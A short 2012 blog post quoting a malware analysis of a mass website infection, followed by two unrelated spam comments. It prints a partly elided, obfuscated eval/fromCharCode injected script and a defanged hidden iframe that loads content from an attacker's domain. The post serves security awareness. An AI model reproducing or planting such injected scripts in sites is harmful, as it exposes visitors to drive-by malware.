Tuesday, March 13, 2012


A great article from the guys over at unmask parasites. Snippet below...
You Need to Pay For This Crypt. Trial Version of Malware? 07 Mar 12 Filed in Website exploits According to the Betteridge’s Law of Headlines “Any headline which ends in a question mark can be answered by the word ‘no’“. Nonetheless, I use this type of a headline for this post because this was the question I asked myself when I came across the following attack. A few days ago I began to notice many websites where Google reported “assexyas .com” as a source of the infection (at this point Google reports 6148 infected sites). They all contained quite a prevalent type of a malicious script (such scripts have been in use for few a few months)
if(window.document)try{location(1 2);} catch(qqq){zz='eva l'; ss=[]; aa=[]+0;aaa=0+[]; if(aa.indexOf(aaa)===0){f='fro'+'m'+'C'+'h'+'ar';f+='Code';} ee='e...skipped...5a3.5a3.5a61.5".split("a");for(i=0;-n.length<-i;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));} if(1)q =ss; if(zz)e (q);

that injected an invisible iframe
ifr ame src='hxxp://tds22 .assexyas .com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;' /ifra me
What was really unusual was the the following text right after the closing script tag: “you need to pay for this crypt“. On some sites it was just that. On other sites it could be several consecutive duplicates of the phrase: “you need to pay for this cryptyou need to pay for this cryptyou need to pay for this cryptyou need to pay for this crypt”

see the rest at blog.unmaskparasites.com


  1. I have copied it but i need to do some editing on some scripts inside it.

    pistol compensators

  2. How can I spread my Youtube Video?

    I want to spread this video as much as possible.
    I've put tags, a title, and all i could think of. What now?
    I want many views on one video.